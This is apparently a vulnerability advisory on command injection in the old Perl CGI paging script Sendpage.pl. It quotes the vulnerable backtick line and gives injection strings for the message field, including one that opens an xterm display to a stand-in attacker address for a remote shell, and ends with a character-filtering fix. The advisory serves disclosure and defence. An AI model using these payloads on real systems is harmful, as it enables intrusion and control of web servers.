Sendpage (Perl CGI) Remote Execution Vulnerability

DESCRIPTION

  • This script is old (1996).
  • This script is available at: http://honor.sprawl.com/Software/Sendpage/
  • The author of the script was contacted on October 2nd, no response has been received.
  • See Bottom for fix.

Despite the scripts age I've seen it around and administrators should be aware of this problem. Sendpage.pl basically reads in some input through standard HTML forms, does some work, and then pipes a string to a user defined executable which will then send that information as a page (page as in the telecommunications type) to the intended recipient.

The offending line of code that allows us to execute our own command is found on line 68.

    68: { $ret=`/bin/echo \"$message\" | $pcmd`; }

Examining the script shows that aside from basic URL decoding (lines 30 and 31) no further parsing is done on $message. So what can we do with this? We can end the echo statement, run our own command, and then start a new "un-ended" echo statement to satisfy the remainder of the command line. In Essence:

	test"; OUR COMMAND; echo "message

As an example go to the form page, choose a recipient, and enter the following as your message:

	test"; touch /tmp/blah; echo "message

Assuming /tmp/blah didn't exist before, it should now. Spawning a shell with the permissions of the web server is as simple as:

	test"; sh -c 'xterm -display ATACKER_IP: \
	0.0 &'; echo "message

To fix, simply filter out all "dangerous" characters: ,;/`\%$#{}-&<>... I prefer to keep things simple and remove all non-alphanumeric characters:

	$message =~ s/[^\w\s]//g;